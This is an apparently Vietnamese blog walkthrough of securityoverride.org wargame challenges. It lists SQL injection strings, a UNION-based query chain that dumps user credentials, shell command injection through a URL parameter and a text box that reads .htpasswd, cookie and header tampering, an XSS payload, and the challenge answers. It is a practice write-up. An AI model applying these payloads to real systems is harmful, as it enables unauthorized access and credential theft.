Top Ad unit 728 × 90

Lastet News

random

Securityoverride.org



Hướng dẫn chơi CTF tại securityoverride.org  phần reconnaissance, basic, javascript

  1. Reconnaissance

    1.1 IP address identification

Dùng lệnh “ping securityoverride.org” trong cmd
KQ: địa chỉ IP: 206.214.216.120 -> Check.

    1.2 NS server identification

Vào trang web http://whois.net tra “securityoverride.org”
Name Server:NS2.423NETWORK.COM
Name Server:NS2.423NETWORK.COM



    1.3 PHP version identification

Dùng add-on HTTP Headers (Google Chrome)
KQ: PHP/5.3.27

    1.4 Full path disclosure identification

Thêm [] sau chữ page.
http://securityoverride.org/challenges/reconnaissance/4/index.php?page[]=1
Kết quả: /opt/lampp/htdocs/challenges/reconnaissance/4/index.php

   1.5 Full path disclosure identification via array

Dùng add-on Edit this Cookie (Google Chrome)
Cho PHPSESSID về giá trị rỗng
KQ: /opt/lampp/public_html/challenges/reconnaissance/5/index.php

2. Basic

   2.1 Low level password discovery

Mở View page source và tìm password( Ctrl + F , gõ password)
KQ: <!– The password is 1382167171 –>

   2.2 Medium level password discovery

Mở View page source ta thấy có file pass.html
Vào trang https://securityoverride.org/challenges/basic/2/pass.html
KQ: 4ns94l2n8sqk

   2.3 User agent

Dùng add-on User-Agent Switcher for Chrome (Google Chrome)
Add thêm 1 User-Agent:
Name: Googlebot
String: Googlebot/2.1 (+http://www.googlebot.com/bot.html)
Chọn User-Agent đó và reload lại trang web

   2.4 Low level Tamper Data

Dùng add-on Request Maker (Google Chrome)
Dùng lệnh POST để gửi gói tin với thông số uname=Admin

   2.5 Low level Tamper Data + additional security

Dùng Firefox với add-on Tamper Data
Vào Tool -> Tamper Data -> nhấn vào Start Tamper
nhấn login -> Tamper
Sửa lại thông số uname=Admin.
Ok

   2.6 Medium level Tamper Data

Dùng Debug trong Google Chrome: Ctrl+Shift+I
Sửa value=”admin@securityoverride.com” thành email của mình.
Reset và checkmail.
KQ: b67nd7rg64f

   2.7 HTTP protocol

Dùng add-on HTTP Headers (Google Chrome)
KQ: 81gl32lb8w0e

  2.8  Low level SQL injection

Sử dụng bypass
Gõ vào textbox password dòng “’ OR a=a –“

   2.9 Cookies

Dùng add-on Edit this Cookie (Google Chrome)
Cho access về giá trị Yes và reload lại web

    2.10 Poisonous Cookies

Nhập password sai 1 lần
Bắt cookie và sửa lại giá trị pass=’ OR 1=1 –
Reload lại web

    2.11 Low level script injection

Dùng lệnh linix trên URL: https://securityoverride.org/challenges/basic/11/index.php?status=1|ls|cat
Xuất hiện file: 4cgh2Sj4A.txt
Vào trang https://securityoverride.org/challenges/basic/11/4cgh2Sj4A.txt
KQ: 4F6gb3xghj6

    2.12 High level SQL injection

https://securityoverride.org/challenges/basic/12/index.php?id=1 order by 5–
https://securityoverride.org/challenges/basic/12/index.php?id=1 union select 1,2,3,4–
Tìm được bảng bị lỗi là bảng 2
https://securityoverride.org/challenges/basic/12/index.php?id=1 union select 1,table_name,3,4 from information_schema.tables–
Tìm được tên bảng bị lỗi: users
https://securityoverride.org/challenges/basic/12/index.php?id=1 union select 1,concat(user,0x3A,password),3,4 from users–
KQ: 4c5D4s4ab3

   2.13 Unsanitized exec (The Magic 8-Ball level)

Sử dụng lệnh Linux trong textbox Question
ls để liệt kê các file

8ball.sh
index.php
level13.php
5h6Xsxab.txt
.htaccess
.htpasswd

gõ: cat .htpasswd ta lấy được username: root
gõ tiếp cat 5h6Xsxab.txt ta lấy được password: 3dVgsa3v4
Vào trang https://securityoverride.org/challenges/basic/13/index.php
Đăng nhâp với username và password ở trên

    2.14 Medium Level XSS

Viết vào comment dòng [color=expression(alert(123))]tru[/color] và click post comment


 3. Javascript

    3.1 Login Bypass

Tắt chức năng chạy javascript
Google Chrome (15.0)
  1. Nhấp vào biểu tượng trình đơn Chrome menu trên thanh công cụ của trình duyệt.
  2. Chọn Cài đặt.
  3. Nhấp vào liên kết Hiển thị cài đặt nâng cao....
  4. Nhấp vào Cài đặt nội dung trong 'phần Bảo mật'.
  5. Chọn Không cho phép bất kỳ trang web nào chạy JavaScript trong phần 'JavaScript'.
Microsoft Internet Explorer, Mozilla Firefox hoặc Apple Safari
Load lại trang http://securityoverride.org/challenges/javascript/1/

   3.2 Login Bypass

View page source
search pasword:
Nhìn dòng onclick=javascript:validate(text2.value,'Admin',text1.value,'75Vd346h')
Username: Admin
Password: 75Vd346h
  3.3 Login Bypass
- View page source
- KQ: 4D3dchfa

    3.4 Login Bypass

View page source

Lấy 4* 2168827.25
KQ: 8675309

    3.5 Extended Math

View page source

Dùng add-on Scratchpad trong FF
Tool -> Web developer -> Scratchpad
gõ như hình

var pass1= '451';
var pass2= '502181';
var pass3= pass1*pass2;
var pass4= pass3-71088;
var pass5= pass4%1472;
var pass6= pass5+'175205';
alert(pass6);
var pass1= '451';
var pass2= '502181';
var pass3= pass1*pass2;
var pass4= pass3-71088;
var pass5= pass4%1472;
var pass6= pass5+'175205';
alert(pass6);
var pass2= '502181';
var pass3= pass1*pass2;
var pass4= pass3-71088;
var pass5= pass4%1472;
var pass6= pass5+'175205';
alert(pass6);
var pass1= '451';
var pass2= '502181';
var pass3= pass1*pass2;
var pass4= pass3-71088;
var pass5= pass4%1472;
var pass6= pass5+'175205';
alert(pass6);
var pass1= '451';
var pass2= '502181';
var pass3= pass1*pass2;
var pass4= pass3-71088;
var pass5= pass4%1472;
var pass6= pass5+'175205';
alert(pass6);
   kết quả  1279175205
Securityoverride.org Reviewed by Unknown on 01:49 Rating: 5

Không có nhận xét nào:

body{ margin-top:50px;} .menuBar{ width:100%; height:50px; display:block; position:absolute; top:0; left:0; } .logo{ float:left; } .nav{ float:right; margin-right:10px;} .nav ul li{ list-style:none; float:left; }

All Rights Reserved by Huy Hùng - KMA © 2014 - 2015
Designed by JOJOThemes

Biểu mẫu liên hệ

Tên

Email *

Thông báo *

Được tạo bởi Blogger.